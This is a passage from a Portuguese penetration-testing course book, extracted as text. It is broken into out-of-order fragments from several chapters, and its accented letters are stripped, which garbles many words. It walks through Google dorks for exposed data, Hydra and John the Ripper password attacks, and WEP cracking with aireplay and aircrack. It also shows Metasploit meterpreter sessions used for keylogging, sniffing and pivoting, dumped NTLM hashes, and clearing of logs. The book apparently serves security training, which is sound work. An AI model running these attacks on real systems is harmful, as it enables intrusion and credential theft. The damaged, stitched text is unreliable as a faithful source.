pelos registros de dom nio no nosso caso o registro br Conseguiremos nome dos respons veis telefone CPF ou CNP end
160. mo comece a realizar os ataques em seu alvo A fun o dessa t cnica identificar a vers o e distribui o do sistema operacional que ir receber a tentativa de intrus o Sendo assim essa t cnica extremamente importante para que o atacante consiga desenvolver de maneira mais precisa e menos ruidosa seu ataque Usando essa t cnica o Pen Tester estar explorando problemas da pilha TCP IP e verificando caracter sticas nicas que permitem que o sistema alvo seja identificado S depois que isso for feito poder o ser escolhidas as melhores ferramentas para explorar o sistema Para que o fingerprint apresente resultados confi veis s o necess rias an lises complexas como e Analise de pacotes que trafegam pela rede e Leitura de banners assinaturas do sistema e An lise de particularidades da pilha TCP IP Para realizar tais an lises podemos utilizar ferramentas espec ficas conhecidas como scanners de fingerprint que s o softwares usados para realizar Cap tulo 5 Levantamento de Informa es 67 tarefas de detec o de sistemas operacionais Entre os scanners existentes podemos dividi los basicamente em dois tipos 5 12 1 Fingerprint passivo O scanner atua como um farejador na rede ou seja fica escutando os pacotes que passam por ela detectando o formato do pacote que esta passando consegue identificar o sistema operacional Para esse tipo de opera o utilizamos a ferramenta
161. mos citar o m dulo para quebrar senhas de Lotus Domino e MySQL 12 6 THC Hydra O hydra um dos utilit rios que abrangem uma grande quantidade de servi os que podem ser alvos de brute force entre eles TELNET FTP Firebird HTTP GET HTTP HEAD HTTPS GET HTTP HEAD HTTP PROXY HTTP PROXY NTLM HTTP FORM GET HTTP FORM POST HTTPS FORM GET HTTPS FORM POSTLDAP2 LADP3 SMB SMBNT MS SQL MYSQL POSTGRES POP3 NTLM IMAP IMAP NTLM NCP NNTP PCNEFS ICQ SAP R3 Cisco auth Cisco enable SMTP AUTH SMTP AUTH NTLM SSH2 SNMP CVS Cisco AAA REXEC SOCKS5 VNC POP3 e VMware Auth Al m disso o hydra fornece suporte a conex es via Cap tulo 12 T cnicas de For a Bruta 144 proxy O xhydra um utilit rio gtk para uso do hydra na interface gr fica 12 6 1 Usando o HydraGTK Para baixar o HydraGTK basta acessar o endere o http freeworld thc org releases hydra 5 8 src tar gz Ap s baixar o arquivo execute os seguintes comandos para descompact lo e compil lo tar xzvf hydra 5 8 src tar gz cd hydra 5 8 src configure make make install cd hydra gtk configure make make install Para executar o programa na interface gr fica basta chamarmos o bin rio que j estar no path do sistema e informar o path do seu c digo fonte com o par metro hydra path 3 xhydra hydra path caminho completo hydra 5 8 src 12 6 2 Hydra no terminal Ex
162. mpenho da quebra da senha por m n o impacta tanto no desempenho de outros programas O padr o desta op o N desabilitado e Save Intervalo no qual o software ir gravar seu progresso para no caso de uma interrup o ele possa recome ar novamente de onde havia parado e Beep Emite um bip quando uma senha quebrada List Rules Single Nesta se o ficam as regras default do software para a quebra das senhas S o regras como substitui o de strings escrita 1337 e outras List Rules Wordlist Cap tulo 12 T cnicas de For a Bruta 138 Nesta se o ficam as regras de substitui o de caracteres modifica es de palavras etc quando se est usando uma wordlist para tentar quebrar as senhas do arquivo List Rules NT Nesta se o ficam as regras utilizadas quando se est quebrando senhas cifradas utilizando o algoritmo NTLM Windows Incremental Aqui ficam as regras para o tipo de quebra de senhas chamado Incremental todos os tipos de tentativas de quebra de senha que o John utiliza ser o explicados mais adiante neste documento List External S o alguns filtros pr definidos para substitui o de palavras elimina o de caracteres indesejados etc 12 5 1 MODOS JtR utiliza alguns modos para que consiga otimizar a quebra da senha Estes modos s o explicados a seguir e Modo Wordlist Para utilizar esse m todo voc vai precisar de uma wordlist Existem v rios lugares
163. n 192 168 0 110 4455 Starting the payload handler Sending stage 747008 bytes Meterpreter session 1 opened 192 168 0 110 4455 gt 192 168 0 135 3055 19 12 7 Atacando um objetivo final a partir de uma m quina j comprometida Acesso do atacante Firewall se Rede LAN Maquina objetivo O primeiro passo obviamente encontrar uma vulnerabilidade no servidor que se encontra na DMZ e explor la usando como payload o meterpreter No terminal do Metasploit digitamos gt use exploit que ataca a vulnerabilidade encontrada gt set PAYLOAD windows meterpreter bind tcp gt set RHOST ip host dmz exploit que ataca a vulnerabilidade encontrada Cap tulo 19 Metasploit Framework 242 Agora precisamos saber o ID da sess o para isso digitamos o seguinte no terminal do meterpreter E gt sessions l O seguinte passo criar uma rota at a m quina que nosso objetivo final indicando seu IP a m scara e o ID de sess o que obtivemos no passo anterior E route add ip maquina objetivo M scara de rede ID Sess o Por ltimo realizamos o ataque m quina objetivo de forma normal como se faria em qualquer outro caso quer dizer buscando a vulnerabilidade e aplicando o respectivo exploit A diferen a que devemos dizer ao Metasploit que deve passar pelo PC que j temos acesso gt use exploit_necess rio gt set PAYLOAD windows
164. n Attack and Audit Framework Essa ferramenta um framework para auditoria e ataque em aplica es web tw P gina do projeto http sourceforge net projects w3af V deos http w3af sourceforge net videos video demos php O mais interessante que podemos personalizar os testes que essa ferramenta pode realizar podendo utilizar tamb m profiles previamente configurados por padr o Temos por exemplo o profile baseado na TOP10 OWASP um relat rio anual das vulnerabilidades mais exploradas lan ado pelo Projeto OWASP Outras possibilidades incluem varredura de auditoria em busca de falhas de configura o ou sitemap que nos retorna um mapa completa do site analisado Cap tulo 16 Ataques a Servidores WEB 195 16 6 Online Scanner H v rias ferramentas online que podemos utilizar para fazer a varredura de web servers e obter informa es necess rias para a explora o de vulnerabilidades encontradas http www netcraft com http www zerodayscan com O site Netcraft oferece informa es sobre as configura es do servidor onde o site est hospedado sobre dom nios vinculados ao que est sendo pesquisado e muitas outras informa es importantes para podermos realizar um ataque com Sucesso Search Web by Domain Explore 1 382 566 web sites visited by users of the Netcraft Toolbar 29th June 2010 Search search tips site contains 4linux com br example si
165. n in normal format oX lt file gt Output scan in XML format oS lt file gt Output scan in s lt rlpt klddi3 format oG lt file gt Output scan in Grepable format oA lt basename gt Output in the three major formats at once v Increase verbosity level use twice for more effect d level Set or increase debugging level Up to 9 packet trace Show all packets sent and received iflist Print host interfaces and routes for debugging log errors Log errors warnings to the normal format output file append output Append to rather than clobber specified output files resume lt filename gt Resume an aborted scan stylesheet lt path URL gt XSL stylesheet to transform XML output to HTML webxml Reference stylesheet from Insecure Org for more portable XML no stylesheet Prevent stylesheet w XML output associating of XSL MISC 6 Enable IPv6 scanning A Enables OS detection and Version detection datadir lt dirname gt Specify custom Nmap data file location send eth send ip Send using raw ethernet frames or IP packets privileged Assume that the user is fully privileged V Print version number h Print this help summary page EXAMPLES Simple nmap v A scanme nmap org nmap v sP 192 168 0 0 16 10 0 0 0 8 nmap y iR 10000 PO p 80 nmap v sS scanme nmap org gt file txt Popular Published syntax NMAP vv A sS WWW XXX YYY ZZZ O p PO oX target xml
166. na Internet que possuem milhares de wordlists dispon veis gratuitamente s dar uma olhada no Google que voc ir encontrar v rias Para te ajudar aqui no item Wordlists voc encontra v rios links para wordlists dispon veis na Internet L voc tamb m encontra algumas dicas de como organizar a sua lista Mas vale lembrar que n o bom que voc tenha entradas duplicadas na sua lista o Jhon the Ripper n o vai fazer absolutamente nada com a sua wordlist antes de come ar a testar as palavras que tem nela Este o modo mais simples suportado pelo John Para utiliz lo voc s especifica uma wordlist e algumas regras para ele fazer combina es das palavras que ele encontrar na lista que voc especificou Quando utilizando determinados Cap tulo 12 T cnicas de For a Bruta 139 algoritmos o JtR se beneficiar se voc colocar senhas com tamanhos mais ou menos parecidos perto umas das outras Por exemplo seria interessante voc colocar as senhas com 8 6 ou 9 caracteres perto umas das outras na sua wordlist A wordlist padr o a ser utilizada pelo John definida no arquivo john conf e Modo Single Crack neste modo que voc deveria come ar a tentar quebrar uma senha Aqui al m de v rias regras de handling serem aplicadas o JtR vai utilizar mais informa es como o nome completo do usu rio e seu diret rio home para tentar descobrir qual a senha Este modo muito mais r pido que o modo Word
167. nas pacotes que contem IVs wlanO Interface wireless Agora vamos enviar um pedido de falsa associa o para o nosso alvo Access falando para ele aceitar os nossos pacotes aireplay ng 1 O e invasao ap a 00 00 00 00 00 01 h 00 00 00 00 00 02 wlanO Onde 1 Op o para mandar uma autentica o falsa 0 Tempo para reassocia o em segundos e ESSID do alvo Nome do access point a Mac Address do Access Point h Nosso MAC Address wlan0 Nossa interface wireless Agora vamos tentar enviar arp request para a rede na tentativa que alguma maquina receba e comece a enviar arp replay para n s aumentando o tr fego rapidamente Isso pode ser observado na tela do airodump ng onde a quantidade de DATA capturada aumentar rapidamente aireplay ng 3 b 00 00 00 00 00 01 h 00 00 00 00 00 02 wlan0O Onde 3 Op o para arp request b MAC Address do Access Point h MAC Address usado na associa o Nesse caso o nosso MAC wlan0 Nossa interface wireless Agora que temos uma quantidade grande de pacotes podemos executar o Cap tulo 17 Ataques a Redes Sem Fio 201 aircrack para de fato descobrirmos a chave E aircrack ng a 1 wep 01 ivs Onde a Modo para for ar um determinado tipo de ataque 1 WEP wep 01 ivs Arquivo gerado pelo airodump ng selecionamos o prefixo wep e apenas pacotes IVs Agora aguardar que o aircra
168. ncion rios da empresa com rela o a maneira com que um ataque de engenharia social pode acontecer e as poss veis informa es que o atacante poder usar nesse ataque Cap tulo 4 Google Hacking 52 4 7 Pr tica dirigida Busca por arquivos de base de dados em sites do governo gt site gov br ext sql Busca por um servidor espec fico gt inurl powered by site sistema com br A pesquisa busca arquivos de e mail em formato mdb gt inurl e mail filetype mdb Essa pesquisa busca telefones disponiveis em intranet encontradas pelo Google gt inurl intranet intext telefone Realizando uma pesquisa dessa maneira poss vel identificar muitos dos subdom nios da Oracle gt site oracle com site www oracle com Detectando sistemas que usando a porta 8080 gt inurl 8080 intext 8080 Encontrando VNC gt intitle VNC inurl 5800 intitle VNC Encontrando VNC gt intitle VNC Viewer for Java Cap tulo 4 Google Hacking 53 Encontrando Webcam ativa gt Active Webcam Page inurl 8080 Encontrando Webcam da toshiba gt intitle toshiba network camera User Login Encontrando Apache 1 3 20 gt Apache 1 3 20 server at intitle index of Asterisk VOIP Flash Interface gt intitle Flash Operator Panel ext php wiki cms inurl as Poss veis falhas em aplica es web gt gt allinurl php site allinurl php do allinurl php content allinurl ph
169. ng Unix Samba 3 5 4 language Unknown domain WORKGROUP Scanned 33 of 55 hosts 060 complete Scanned 39 of 55 hosts 070 complete Scanned 44 of 55 hosts 080 complete Scanned 50 of 55 hosts 090 complete Scanned 55 of 55 hosts 100 complete auxiliary smb_version gt Se houver algum host que nao queiramos utilizar como alvo eles podem ser removidos clicando com o bot o direito expandindo o menu Host e selecionando a op o Remove Host Podemos ver na figura abaixo o resultado de nossa varredura que h dois alvos 2003 Server que podemos selecionar para realizar varreduras adicionais Perceba que o Armitage configura o valor de RHOSTS baseado em nossa sele o Cap tulo 19 Metasploit Framework 249 Roj Clicando com o bot o direito e selecionando Services uma nova aba se Console X Y lotus misc motorola E mssql T mysql netbios E nfs ntp oracle mm pop3 E portscan ack ftpbounce LJ syn avvrvvVvVY VY xmas EB postgres E rogue gt rservices r BR cin Armitage View Hosts Attacks Workspaces Help 192 168 1 204 192 168 1 205 TCP Port Scanner Enumerate open TCP services Option Value CONCURRENCY 10 FILTER INTERFACE PCAPFILE k RHOSTS 192 168 1 204 192 168 1 205 SNAPLEN 65535 THREADS 24 192 168 1 203 445 is runni Scanned 06 of 55 Scanned 11 of 55 Scanned
170. nsiderada de valor nesse primeiro passo e Concorrentes e Nome de funcion rios e Endere os e Telefones e Sites Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 32 e Empresas e Comunidades sociais e Empresas do mesmo grupo e etc 2 4 2 Varredura Nessa fase o atacante busca informa es mais detalhadas o alvo que posam permitir definir seus vetores de ataque e enxergar as possibilidades que podem permitir ganhar acesso ao sistema atrav s da explora o de alguma falha encontrada Aqui buscamos informa es que respondam algumas perguntas como por exemplo Qual sistema operacional o alvo utiliza Quais os servi os est o sendo executados no alvo Quais servi os est o dispon veis para acesso Qual a vers o de cada servi o sendo executado H IDS IPS na rede H honeypots na rede H firewalls na rede Existe uma rede interna e outra externa como uma DMZ H servi os com acesso p blico rodando em alguma m quina H algum software malicioso j sendo executado em alguma m quina A partir dessas informa es o atacante pode buscar maiores detalhes na internet ou f runs especializados em busca de exploits que permitam explorar falhas existentes nas vers es dos servi os sendo executados Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 33 2 4 3 Ganhando acesso Aqui o atacante coloca em pr tica tudo aquilo que planejou a partir das inf
171. nterromper como o explorer exe por exemplo Agora vejamos no console meterpreter o processo que estamos com o comando getpid seguido do comando ps Sabendo o n mero do processo para o qual queremos migrar vamos executar o comando migrate pid para migrar de processo 3 l gt migrate 472 Cap tulo 19 Metasploit Framework 233 meterpreter gt migrate 472 Migrating to 472 Migration completed successfully meterpreter gt fj Com isso feito vamos testar os comandos sysinfo e ipconfig Para saber os comandos disponiveis digite help ou 19 12 2 Keylogging com Meterpreter Agora vamos usar o keylogging e vamos tentar capturar o maximo das teclas digitadas pelo usu rio Com o comando keyscan start iniciamos o nosso keylogger ES gt keyscan start meterpreter gt keyscan start Starting the keystroke sniffer meterpreter gt Agora vamos ver o que nosso keylogger pegou com o comando keyscan dump e logo em seguida finalizo o mesmo gt keyscan dump gt keyscan stop meterpreter gt keyscan dump Dumping captured keystrokes meulogin lt Tab gt minhasenha lt Return gt meterpreter gt keyscan stop Stopping the keystroke sniffer meterpreter gt E Cap tulo 19 Metasploit Framework 234 19 12 3 Sniffing com Meterpreter Primeiramente precisamos carregar o m dulo sniffer com o comando use sniffer
172. nto de amea as ser diferente requerendo tamb m rea es e posturas diferentes para diminu las Vamos separar as amea as em dois grandes grupos f sicas e l gicas As amea as f sicas caso ocorram comprometer o o ambiente f sico onde a informa o est armazenada ou processada Dentre as amea as f sicas podemos considerar e Alagamento e Raios e Acessos indevidos e Desabamentos E no grupo das amea as l gicas podemos contar as seguintes e Infec o por v rus e Acessos remotos rede e Viola o de senhas Assim como dividimos as amea as em dois grandes grupos os ataques tamb m podem ser divididos da mesma maneira Internos e Externos Os ataques internos representam por volta de 70 dos ataques que ocorrem aos sistemas e redes Mesmo que a maioria das pessoas acreditem que a maior parte dos ataques surjam de fontes externas essa uma maneira err nea de encarar as coisas Dentre os ataques internos encontramos em sua maioria aqueles realizados por funcion rios de dentro da pr pria organiza o que est o insatisfeitos buscam Cap tulo 1 Introdu o Seguran a da Informa o 21 vingan a ou participam de alguma a o de espionagem industrial vendendo as informa es conseguidas para o concorrente Outro tipo de ataque vindo de insiders surge de funcion rios despreparados que sem o devido conhecimento do funcionamento do sistema ou das pol ticas organizacionais ag
173. o Nesses casos o cliente precisa visitar um site ou abrir um e mail ou ent o abrir um arquivo que explorar a aplica o que est instalada no computador do cliente Packs como Mpack e IcePack exploram vulnerabilidades em navegadores webs ou seja realizam um client side attack 2 6 Metodologias existentes Para um teste de invas o n o ficar solto e sem uma sequ ncia l gica coerente a comunidade de seguran a atrav s de alguns rg os associa es institutos e pesquisadores criou uma s rie de metodologias para servirem como guias b sicos para a correta realiza o de testes de invas o Isso permite uma certa padroniza o nos testes realizados seguindo uma outra metodologia Podemos citar as seguintes metodologias conhecidas internacionalmente o OSSTMM e OWASP Testing Guide Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 36 NIST SP800 115 e SP800 42 ISSAF PenTest Frameworks Nosso treinamento foi feito baseado na metodologia OSSTMM Open Source Security Testing Methodology Manual e nessa metodologia as premissas para realizar um teste s o O teste dever ser conduzido exaustivamente O teste deve contemplar todos os itens necess rios O escopo do teste n o deve ferir os direitos humanos b sicos Os resultados devem ser quantific veis Os resultados devem ser consistentes Os resultados devem conter apenas o que foi obtido com os testes Essas s o as premi
174. o Quanto mais a tecnologia evolui mais f cil torna se a opera o dos novos sistemas e ferramentas J vai ao longe o tempo em que era necess rio gravar de cabe a 500 comandos diferentes para utilizar o computador para as tarefas mais costumeiras e simples do dia a dia Hoje em dia tudo est ao alcance de um clique do mouse e quando n o de um movimento de cabe a se pensarmos nos sistemas de captura de movimentos Cap tulo 1 Introdu o Seguran a da Informa o 17 e Aumento do uso de redes e interliga o das aplica es Tudo est conectado atualmente E quando uma m quina ou sistema comprometido tudo o que est ao seu redor corre o risco de ser comprometido tamb m Isso demanda uma maior capacidade de gerenciamento do parque computacional que cresce exponencialmente e muitas vezes de forma desordenada e Diminui o do n vel de conhecimento para a execu o de um ataque avan ado Com a facilidade de uso aumentando gradativamente a necessidade de conhecimento de alto n vel para realizar ataques avan ados tamb m diminui Se um adolescente de 12 anos procurar na internet sobre ataques de nega o de servi o por exemplo encontrar ferramentas de simples utiliza o e pode facilmente derrubar um grande servidor e Aumento da complexidade para administra o de infraestrutura de computadores e gerenciamento Quanto maior o parque computacional mais dif cil se torna seu gerenciamento e
175. o apt get update Armitage View Hosts Attacks Workspaces Help ms04 011 Isass 4 ms04 031 netdde 4 ms05_039_pnp ms06_025_rasmans_reg o ms06 025 rras ms06 040 netapi ms06 066 nwapi 192 168 1 203 192 168 1 206 ms06 066 nwwks NT AUTHORITY SYSTEM NENANFHOELUIYSYSTEM XEN XP PATCHED ms06 070 wkssvc ms07 029 msdns zonename ms08 067 netapi ms09 050 smb2 negotiate func i msl0 061 spoolss netidentity xtierrpcpipe f a a a ol IB psexec smb_relay 192 168 1 201 192 168 1 205 timbuktu_plughntcommand_bof NT AUTHORITY SYSTEM q aama gt AUTHORITY SYSTEM XEN 2K3 FUZZ gt smtp f gt E ssh pol x 192 168 1 204 Console X scanner smb smb version X scanner portscan tcp X Services X Credentials X Meterpreterl X user pass host Administrator 8lcbcea8a9af93bbaad3b435b51404ee 561 192 168 1 201 Guest aad3b435b51404eeaad3b435b51404ee 31 192 168 1 201 HelpAssistant 9a6ae26408b0629ddc621c90c897b42d 07a 192 168 1 201 SUPPORT 388945a0 aad3b435b51404eeaad3b435b51404ee ebf 192 168 1 201 victim 8lcbcea8a9af93bbaad3b435b51404ee 561 192 168 1 201 Export Cap tulo 19 Metasploit Framework 245 19 13 1 Configura o do Armitage Para instalar o Armitage no Backtrack precisamos atualizar os reposit rios e instalar o pacote armitage root bt apt get update root bt aptitude inst
176. o como usar o m dulo limit ou recent do iptables pois as conex es excedentes seriam descartadas pelo firewall sendo que desta forma o pr prio firewall tiraria o servi o do ar Se eu por exemplo limito as conex es SYN a 10 seg um atacante precisa apenas manter uma taxa de SYNs superior a 10 s para que conex es leg timas sejam descartadas pelo firewall O firewall tornou a tarefa do atacante ainda mais f cil Um ataque de Syn Flood feito com os IPs forjados spoof para que o atacante n o receba os Syn Cap tulo 9 Testando o sistema 111 ACKs de suas falsas solicita es 9 5 3 Smurf Attack O Smurf outro tipo de ataque de nega o de servi o O agressor envia uma r pida sequ ncia de solicita es de Ping um teste para verificar se um servidor da Internet est acess vel para um endere o de broadcast Usando spoofing o atacante faz com que o servidor de broadcast encaminhe as respostas n o para o seu endere o mas para o da v tima Assim o computador alvo inundado pelo Ping Smurf Attack m Attacker Sends Packet with Spoofed IP Address rer al SD Se ICMP responses are forwarded to the victim 5 9 6 Recomenda es sugerido que o Pen tester seja cauteloso com o uso desse tipo de ataque ou de ferramentas que possam causar uma nega o de servi o Exceto em casos que o cliente solicite tal tipo de ataque n o devemos realizar esse ataque pois pode
177. o conhecidas como anti forensic N o h necessidade desse tipo de a o por parte de um pentester caso queira deixar as evid ncias de explora o para posterior an lise por parte da equipe de Ti da empresa contratante No entanto caso tenha como objetivo testar tamb m a capacidade da equipe de per cia forense em investigar um caso de invas o interessante implementar os passos estudados nesse cap tulo 20 3 O que encobrir e Logs de IDS gt Onde s o armazenadas todas as evid ncias de tr fego anormal que tenha sido detectado na rede Isso inclui desde o envio de arquivos maliciosos varreduras no sistema em busca de informa es e Logs de Firewall gt Logs que guardam as informa es filtradas por regras de firewall Normalmente os administradores quando criam as regras de firewall tem por h bito mandar armazenar em log tentativas de varreduras ataques de brute force e acesso sem autoriza o a servi os espec ficos e Arquivos copiados no sistema gt Qualquer arquivo que tenha sido copiado para o sistema mesmo que posteriormente seja apagado deixa rastros que podem ser recuperados com ferramentas espec ficas Cap tulo 20 Apagando Rastros 264 e Arquivos sendo executados como backdoors por exemplo gt Todo programa ou arquivo em execu o reconhecido pelo sistema como um processo e como um pode ser recuperado da mem ria Existem v rias formas de mascarar a execu o
178. o de e mail para onde eles enviar o o n mero de registro x opt nessus bin nessus fetch register XXXX XXXX XXXX XXXX opt nessus sbin nessus update plugins etc init d nessusd start 4 Acesse em seu browser https 127 0 0 1 8834 8 8 Definindo vetores de ataque importante antes de iniciarmos qualquer a o efetiva contra nosso alvo definirmos as v rias possibilidades de ataques existentes dentro do contexto das informa es adquiridas nas fases anteriores Por exemplo se definirmos que o objetivo do teste de invas o conseguir acesso como root no sistema ap s o levantamento das informa es fingerprint enumera o e etc decidiremos quais s o os poss veis ataques que podem ser realizados de acordo com as informa es que conseguimos Ap s definirmos os ataques vamos classific los em n vel de dificuldade sendo 1 praticamente em dificuldade e 10 o valor que definiremos os ataques de maior dificuldade e com alta improbabilidade de conseguir sucesso Cap tulo 8 Enumera o de informa es e servi os 99 Para definirmos os vetores e coloc los em um mapa gr fico que facilite sua visualiza o e compreens o vamos utilizar uma t cnica cnamada mapas mentais desenvolvida para facilitar a reuni o de informa es de forma resumida de condensada em um mapa gr fico e posterior compreens o das mesmas sem perder seu principal significado e conte dos
179. o e outros detalhes 7 5 3 SS TCP SYN scan T cnica tamb m conhecida como half open pois n o abre uma conex o TCP completa enviado um pacote SYN como se ele fosse uma conex o real e aguarda uma resposta Caso um pacote SYN ACK seja recebido a porta est aberta enquanto que um RST ACK como resposta indica que a porta est fechada A vantagem dessa abordagem que poucos ir o detectar esse scanning de portas 7 5 4 sT TCP connect scan a t cnica mais b sica de TCP scanning utilizada a chamada de sistema system call connect que envia um sinal as portas ativas Caso a porta esteja aberta recebe como resposta connect um dos scan mais r pidos por m f cil de ser detectado 7 5 5 SU UDP scan Este m todo utilizado para determinar qual porta UDP esta aberta em um host A t cnica consiste em enviar um pacote UDP de O byte para cada porta do host Se for recebida uma mensagem ICMP port unreachable ent o a porta est fechada sen o a porta pode estar aberta Para variar um pouco a Cap tulo 7 Varreduras ativas passivas e furtivas de rede 84 Microsoft ignorou a sugest o da RFC e com isso a varredura de m quinas Windows muito r pida 7 5 6 SF SX SN Stealth FIN Xmas Tree ou Null Alguns firewalls e filtros de pacotes detectam pacotes SYN s em portas restritas ent o necess rio utilizar m todos avan ados para atravessar esses softwar
180. o que um Buffer Overflow e Aprender como explorar uma falha dessa categoria Cap tulo 18 Exploits 207 18 2 Mas afinal o que um exploit Um exploit em seguran a da informa o um programa de computador uma por o de dados ou uma sequ ncia de comandos que se aproveita das vulnerabilidades de um sistema computacional como o pr prio sistema operativo ou servi os de intera o de protocolos ex servidores Web S o geralmente elaborados por hackers como programas de demonstra o das vulnerabilidades a fim de que as falhas sejam corrigidas ou por crackers a fim de ganhar acesso n o autorizado a sistemas Por isso muitos crackers n o publicam seus exploits conhecidos como Odays e o seu uso massificado deve se aos script kiddies Quatro sites que podem ser usados como fonte de exploits s o tw www milwOrm com www securityfocus com www packetstormsecurity com www metasploit com 18 3 Organizacao dos Processos na Memoria Para entendermos como funciona um buffer overflow n s precisaremos entender como funciona a pilha stack A regi o de texto fixa pelo programa e inclui as instru es propriamente ditas e os dados somente leitura Esta regi o corresponde ao segmento de texto do bin rio execut vel e normalmente marcada como somente leitura para que qualquer tentativa de escrev la resulte em viola o de segmenta o com o objetivo de n o permitir c digo
181. onjunto de dados de forma que a rota que os primeiros iam tomar seja conduzida para um lugar ou de uma maneira que sem o encapsulamento eles n o poderiam fazer Existem v rios motivos pelos quais se pode querer implementar um t nel e Proteger dados atrav s de uma conex o criptografada n o suportada localmente e Realizar uma conex o cujo protocolo seria bloqueado n o fosse o uso do t nel e Conectar se a um destino bloqueado para conex o direta e Conectar se a uma m quina de rede interna como se fosse de dentro para fora e Mascaramento de IP Existem diversos aplicativos que nos permitem abrir t neis manualmente Como o tunelamento pode possuir diferentes formas e fun es os aplicativos naturalmente funcionando de maneiras e sob condi es diferentes Alguns deles foram projetados especificamente para tunelar conex es enquanto outros podem ter mais de uma fun o ou mesmo ser um canivete su o do TCP IP Os aplicativos que podemos utilizar aqui sao Cap tulo 7 Varreduras ativas passivas e furtivas de rede 88 e Netcat canivete su o TCP IP e OpenSSH shell remoto t nel criptogr fico Httptunnel t nel http para atravessar firewalls e Corkscrew tunela SSH em http para atravessar firewalls 7 8 Pratica dirigida 7 8 1 Tunelando com o Netcat Abra tr s terminais A id ia que um primeiro terminal vai escutar em uma porta de forma regular um segundo vai abrir um t
182. or onde come ar O primeiro passo para come ar a coleta de informa es navegar no website do alvo Vamos tomar como exemplo o website que hospeda o kernel Linux Abra o navegador e aponte para http www kernel org Que tipo de informa es voc conseguiu encontrar no site Neste site h pelo menos tr s informa es que um cracker levaria em considera o e Dois e mails v lidos Cap tulo 5 Levantamento de Informa es 56 e Um endere o para acompanhar as estat sticas dos servidores e E uma lista com tecnologias e fornecedores N o acredita Ent o de uma olhada Os e mails s o webmaster kernel org e ftpadmin kernel org http cacti kernel org graph view php action preview http www kernel org powered html Ainda n o encontrou Ent o experimente olhar o c digo fonte da aplica o Como vimos um simples acesso e um pouco de observa o no site do alvo pode nos fornecer algumas informa es no m nimo interessantes Depois de observar um website procura de informa es o pr ximo passo pesquisar sobre coisas n o t o bvias por m ainda sim p blicas 5 4 Consulta a informa es de dom nio Ap s observar o site do alvo de interesse do atacante conhecer detalhes referentes ao nome de dom nio do cliente A primeira coisa a ser feita buscar informa es sobre o propriet rio de um dom nio Isso pode ser feito utilizando o comando whois whois 4linux com br
183. or p ginas publicadas dentro de um range de datas Voc pode usar este operador para localizar p ginas indexadas pelo Google em um determinado intervalo de datas Toda vez que o Google rastreia uma p gina a data em sua base de dados alterada Se o Google localizar alguma p gina Web obscura pode acontecer de index la apenas uma vez e nunca retornar ela Se voc achar que suas pesquisas est o entupidas com esses tipos de p ginas obscuras voc pode remov las de sua pesquisa e obter resultados mais atualizados atrav s do uso eficaz do operador daterange Lembrando que a data deve ser informada no formato do calend rio Juliano informando o n mero de dias existentes entre 4713 AC e a data em que se quer buscar 4 3 9 cache Mostra a vers o em cache de uma determinada p gina Como j discutimos o Google mant m snapshots de p ginas que indexou e que podemos acessar atrav s do link em cache na p gina de resultados de busca Se quiser ir direto para a vers o em cache de uma p gina sem antes fazer uma consulta ao Google para chegar ao link em cache na p gina de resultados voc pode simplesmente usar o operador cache em uma consulta como cache blackhat com ou cache www netsec net content index jsp 4 3 10 info Mostra conte do existente no sum rio de informa es do Google Cap tulo 4 Google Hacking 50 O operador info mostra o resumo das informa es de um site e fornece links p
184. orma es obtidas previamente Dependendo de seus vetores de ataque ele pode realizar uma s rie de ataques buscando ganhar acesso ao sistema alvo como por exemplo e Ataques de for a bruta local e Ataques de for a bruta remoto e Captura de tr fego de rede e Ataque de engenharia social e Ataques s aplica es WEB e Explora o de servi os e Explora o de sistema operacional Conseguindo acesso ao sistema o atacante realizar uma s rie de opera es buscando a eleva o de seus privil gios caso o mesmo j n o seja de root 2 4 4 Mantendo acesso Ap s conseguir o acesso o atacante busca de alguma forma manter o acesso conseguido atrav s de seus ataques Isso normalmente n o utilizado por um pen tester a n o ser que seja extremamente necess rio O risco de configurar o sistema implantando backdoors ou outro tipo de dispositivo que permita o acesso posterior que a ferramenta utilizada pode voltar se contra voc pois outras pessoas podem descobri la explor la e ganhar acesso facilmente ao sistema comprometido Portanto essa fase quando realizada durante um teste de invas o precisa de extremo cuidado e planejamento para n o trazer comprometimentos e preju zos Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 34 desnecess rios ao alvo 2 4 5 Limpando rastros Nessa fase final do ataque o atacante apaga todos os seus rastros todos os registros de opera es
185. os com e mail endere o e telefone e Permiss o assinada um documento assinado pelo respons vel pela empresa com os nomes das pessoas da equipe autorizadas a realizar os testes Dentro do que foi acordado devemos ter o m ximo cuidado para n o causar comprometimentos que tragam algum tipo de preju zo ao cliente como a indisponibilidade de informa es vitais para o funcionamento organizacional por exemplo Levando em conta esse aspecto se poss vel interessante reproduzir o ambiente de testes em m quina virtual para aproximar se do poss vel comportamento do ambiente testado antes de finalmente lan armos alguns tipos de ataques Isso evitaria a maior parte dos comprometimentos n o planejados infraestrutura do cliente e pode poupar muita dor de cabe a 2 9 Exerc cios te ricos 1 Qual o objetivo da OSSTMM 2 Qual a necessidade da utiliza o de uma metodologia para realizar um teste de invas o Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 40 3 Cite algumas publica es especiais da NIST que poderiam ser utilizadas para a realiza o de um teste de invas o 4 Quais as fases de um ataque Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 41 Cap tulo 3 Escrita de Relat rio 3 1 Objetivos e Entender o que um relat rio e Aprender o que deve conter em um relat rio de teste de invas o e Desenvolver um modelo
186. p meio allinurl php produto allinurl php cat Cap tulo 4 Google Hacking 54 Cap tulo 5 Levantamento de Informa es 5 1 Objetivos e Conhecer os principais meios para coletar informa es sobre o alvo e Coletar informa es utilizando ferramentas p blicas e Coletar informa es utilizando ferramentas espec ficas e Levantar dom nios utilizando consultas p blicas e ferramentas Cap tulo 5 Levantamento de Informa es 55 5 2 Footprint Footprint a primeira etapa a ser realizada em um teste de intrus o Durante essa etapa o Pen tester coleta o m ximo de informa es para alimentar a anatomia de ataque Podemos dizer que a fase em que o Pen tester se prepara para realizar o ataque Em m dia um Pen tester gasta 70 do tempo analisando um alvo e levantando informa es sobre o mesmo Apenas 30 do tempo e usado para realizar o ataque e avaliar a possibilidade de um atacante realizar procedimentos p s invas o na m quina alvo Quando estamos realizando um footprint devemos buscar informa es relativas topologia da rede sistemas operacionais quantidade de m quinas e localiza o f sica Al m disso importante tamb m descobrir informa es sobre os funcion rios da empresa como emails cargos e tamb m fun o espec fica no ambiente D me seis horas para cortar uma rvore e eu gastarei as primeiras 